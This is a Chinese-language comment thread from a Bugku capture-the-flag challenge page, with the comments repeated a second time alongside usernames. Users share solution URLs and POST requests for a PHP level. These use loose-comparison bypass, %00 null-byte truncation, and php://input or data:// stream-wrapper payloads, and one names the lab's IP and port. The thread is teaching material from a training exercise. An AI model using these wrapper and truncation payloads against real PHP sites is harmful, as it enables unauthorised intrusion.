参考学习:https://blog.csdn.net/qq_36292543/article/details/136676985
POST /hello.php?id=0a&a=php://input&b=*asdfassdf 内容为:bugku is a nice plateform!
?id=0p&b=%00114514&a=data://text/plain,bugku is a nice plateform! //id弱匹配绕过,b使用%00截断符截断语句让111在1114中且开头的字符不是4,a运用伪协议
firfox浏览器的post不能只传值,所以用php://post的方式传值点execute没反应,试试用其他方式a=data://text/plain,bugku is a nice plateform!
flag{我就知道有人投机取巧}
对于小白来说确实是个好题
总结一下吧,查到源码后得到url 解码后得到base64,解码后得到url,解码后出现php源代码,查看源代码检查好规则,构建payload,bp抓包,发送给重发器,查看结果。
为什么我登陆到1p.html以后它直接跳转到https://www.bugku.com/,求救救我
在跳转网页时进行bp抓包,在返回包中能看到网站后面藏了东西,然后解码。
我也是,什么原因
?id=0a&b=*111111&a=data://text/plain;base64,YnVna3UgaXMgYSBuaWNlIHBsYXRlZm9ybSE=
http://114.67.175.224:14407/hello.php?id=a&a=data:,bugku is a nice plateform!&b=%0011111
...
评论
不懂就问 2月前
举报
参考学习:https://blog.csdn.net/qq_36292543/article/details/136676985
一路奔腾 4月前
举报
POST /hello.php?id=0a&a=php://input&b=*asdfassdf 内容为:bugku is a nice plateform!
xawm 5月前
举报
?id=0p&b=%00114514&a=data://text/plain,bugku is a nice plateform! //id弱匹配绕过,b使用%00截断符截断语句让111在1114中且开头的字符不是4,a运用伪协议
miaolegecui 5月前
举报
firfox浏览器的post不能只传值,所以用php://post的方式传值点execute没反应,试试用其他方式a=data://text/plain,bugku is a nice plateform!
1.23 6月前
举报
flag{我就知道有人投机取巧}
GET-lee 9月前
举报
对于小白来说确实是个好题
冯飞99 9月前
举报
总结一下吧,查到源码后得到url 解码后得到base64,解码后得到url,解码后出现php源代码,查看源代码检查好规则,构建payload,bp抓包,发送给重发器,查看结果。
2089669143 10月前
举报
为什么我登陆到1p.html以后它直接跳转到https://www.bugku.com/,求救救我
MiracleWolf 9月前
举报
在跳转网页时进行bp抓包,在返回包中能看到网站后面藏了东西,然后解码。
莴笋要种泥里 9月前
举报
我也是,什么原因
evens 10月前
举报
?id=0a&b=*111111&a=data://text/plain;base64,YnVna3UgaXMgYSBuaWNlIHBsYXRlZm9ybSE=
wxy1343 11月前
举报
http://114.67.175.224:14407/hello.php?id=a&a=data:,bugku is a nice plateform!&b=%0011111